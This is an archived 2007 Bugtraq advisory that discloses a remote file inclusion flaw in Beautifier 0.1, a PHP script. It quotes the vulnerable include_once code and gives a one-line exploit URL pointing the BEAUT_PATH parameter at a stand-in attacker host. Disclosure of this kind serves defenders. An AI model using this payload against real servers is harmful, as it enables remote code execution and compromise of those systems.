bugtraq August 2007 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: Beautifier Version 0.1 Remote File Include Vulnerabilit

Beautifier Version 0.1 Remote File Include Vulnerability // MefistoLabs.Com

From: <ilkerkandemir_at_nospam>
Date: Sat Aug 11 2007 - 15:06:24 GMT
To: bugtraq@securityfocus.com
('binary' encoding is not supported, stored as-is)

MefistoLabs.Com PreSents...

Script: Beautifier Version 0.1
Script Download1: http://www.beautifier.org/php/beautifier-php-full-current.tar.gz Script Download2: http://freshmeat.net/projects/beautifier/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
include_once($BEAUT_PATH."/Beautifier/HFile.php"); include_once($BEAUT_PATH."/Beautifier/Context.php");


Exploit: [Beautifier_path]/Beautifier/Core.php?BEAUT_PATH=http://attacker.txt?


Tnx: Ajann,Dumenci,H0tTurk,Str0ke

# MefistoLabs.Com